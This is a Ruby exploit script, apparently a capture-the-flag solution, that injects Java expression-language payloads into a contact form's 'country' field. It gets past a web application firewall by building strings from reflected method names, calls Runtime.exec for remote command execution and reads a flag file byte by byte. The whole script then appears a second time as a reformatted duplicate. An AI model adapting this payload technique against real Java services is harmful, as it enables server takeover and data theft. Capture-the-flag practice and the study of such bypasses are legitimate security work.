maikypedia/script.rb

## script.rb
require 'net/http'
require 'json'

# ENV['http_proxy'] = 'http://127.0.0.1:8080' # Burp Listener

$domain = 'frog-waf.chals.sekai.team'
$endpoint = "/addContact"
$http = Net::HTTP.new($domain)

def array_int num
    ("[],"*num)[0...-1]
end

def send_payload payload
    data = {
        "description" => "Maiky",
        "firstName" => "Maiky",
        "lastName" => "Maiky",
        "country" => "${%s}" % [payload]
    }
    headers = {
    'Content-Type' => 'application/json'
    }
    response = $http.post($endpoint, data.to_json, headers)
    return JSON.parse(response.body)["violations"][0]["message"][0...-23]
end

def get_charlist
    $charlist = []
    while true
        element = send_payload "[].getClass().getMethods()[[%s].size()]" % [array_int($charlist.length)]
        if element.length != 0
            $charlist << element
        else
            break
        end
    end
end

def get_payload_subcall(og_payload,isUpper)
    search = og_payload
    completed = 0
    payload = ""
    (0...$charlist.length).each do |line|
        while completed != og_payload.length
            if $charlist[line].include?(isUpper ? search.downcase : search)
                payload +=  ".concat([].getClass().getMethods()[[" + array_int(line) + "].size()].toString().substring([" + array_int($charlist[line].index(isUpper ? search.downcase : search)) + "].size(),[" + array_int($charlist[line].index(isUpper ? search.downcase : search)+search.length) + "].size()))"
                completed+=search.length
                search = og_payload[completed..-1]
                break
            else
                search = search[0..-2]
            end
        end
    end

    return isUpper ? payload[7..-1]+".toUpperCase()" : payload[7..-1]
end

# Special chars use -> java.lang.Character
def get_special_char(special_char)
    payload = "([].getClass()["+get_payload("forName")+"]("+get_payload("java.lang.Character")+").getMethods()[[" + array_int(39) + "].size()].invoke(null, ["+array_int(special_char.codepoints[0])+"].size())[[].size()])"
end

def get_payload(og_payload)
    sections = og_payload.scan(/[A-Z]+|[a-z\. ]+|\d+|[^\w\d\s]+/)
    result = ""
    sections.each do |section|
        if section.match(/[A-Z]/)
            result += ".concat(" + get_payload_subcall(section, true) + ")"
        elsif section.match(/[a-z\. ]/)
            result += ".concat(" + get_payload_subcall(section, false) + ")"
        elsif section.match(/\d+/)
            result += ".concat([" + array_int(section.to_i) + "].size().toString())"
        elsif section.match(/[^\w\d\s]+/)
            result += ".concat(" + get_special_char(section) + ")"
        end
    end
    return result[7..-1]
end

def exec_code code
    final_payload = "[].getClass()["+get_payload("forName")+"]("+get_payload("java.lang.Runtime")+").getMethods()[[[],[],[],[],[],[]].size()].invoke(null).exec("+ get_payload(code) + ").getInputStream().readAllBytes()"
    result = ""
    while true
        element = send_payload final_payload + "[[%s].size()]" % [array_int(result.length)]
        if element.length != 0
            result += element.to_i.chr
            puts result
        else
            break
        end
    end
    return result
end

# SETUP THE CHARLIST
puts "[+] Setting up the charlist, this may take a while"
get_charlist
exec_code "cat flag-a6cd856505af7f809c24be3ccdfe5faf.txt"
	require 'net/http'
	require 'json'

	# ENV['http_proxy'] = 'http://127.0.0.1:8080' # Burp Listener

	$domain = 'frog-waf.chals.sekai.team'
	$endpoint = "/addContact"
	$http = Net::HTTP.new($domain)

	def array_int num
	("[],"*num)[0...-1]
	end

	def send_payload payload
	data = {
	"description" => "Maiky",
	"firstName" => "Maiky",
	"lastName" => "Maiky",
	"country" => "${%s}" % [payload]
	}
	headers = {
	'Content-Type' => 'application/json'
	}
	response = $http.post($endpoint, data.to_json, headers)
	return JSON.parse(response.body)["violations"][0]["message"][0...-23]
	end

	def get_charlist
	$charlist = []
	while true
	element = send_payload "[].getClass().getMethods()[[%s].size()]" % [array_int($charlist.length)]
	if element.length != 0
	$charlist << element
	else
	break
	end
	end
	end

	def get_payload_subcall(og_payload,isUpper)
	search = og_payload
	completed = 0
	payload = ""
	(0...$charlist.length).each do \|line\|
	while completed != og_payload.length
	if $charlist[line].include?(isUpper ? search.downcase : search)
	payload += ".concat([].getClass().getMethods()[[" + array_int(line) + "].size()].toString().substring([" + array_int($charlist[line].index(isUpper ? search.downcase : search)) + "].size(),[" + array_int($charlist[line].index(isUpper ? search.downcase : search)+search.length) + "].size()))"
	completed+=search.length
	search = og_payload[completed..-1]
	break
	else
	search = search[0..-2]
	end
	end
	end

	return isUpper ? payload[7..-1]+".toUpperCase()" : payload[7..-1]
	end

	# Special chars use -> java.lang.Character
	def get_special_char(special_char)
	payload = "([].getClass()["+get_payload("forName")+"]("+get_payload("java.lang.Character")+").getMethods()[[" + array_int(39) + "].size()].invoke(null, ["+array_int(special_char.codepoints[0])+"].size())[[].size()])"
	end

	def get_payload(og_payload)
	sections = og_payload.scan(/[A-Z]+\|[a-z\. ]+\|\d+\|[^\w\d\s]+/)
	result = ""
	sections.each do \|section\|
	if section.match(/[A-Z]/)
	result += ".concat(" + get_payload_subcall(section, true) + ")"
	elsif section.match(/[a-z\. ]/)
	result += ".concat(" + get_payload_subcall(section, false) + ")"
	elsif section.match(/\d+/)
	result += ".concat([" + array_int(section.to_i) + "].size().toString())"
	elsif section.match(/[^\w\d\s]+/)
	result += ".concat(" + get_special_char(section) + ")"
	end
	end
	return result[7..-1]
	end

	def exec_code code
	final_payload = "[].getClass()["+get_payload("forName")+"]("+get_payload("java.lang.Runtime")+").getMethods()[[[],[],[],[],[],[]].size()].invoke(null).exec("+ get_payload(code) + ").getInputStream().readAllBytes()"
	result = ""
	while true
	element = send_payload final_payload + "[[%s].size()]" % [array_int(result.length)]
	if element.length != 0
	result += element.to_i.chr
	puts result
	else
	break
	end
	end
	return result
	end

	# SETUP THE CHARLIST
	puts "[+] Setting up the charlist, this may take a while"
	get_charlist
	exec_code "cat flag-a6cd856505af7f809c24be3ccdfe5faf.txt"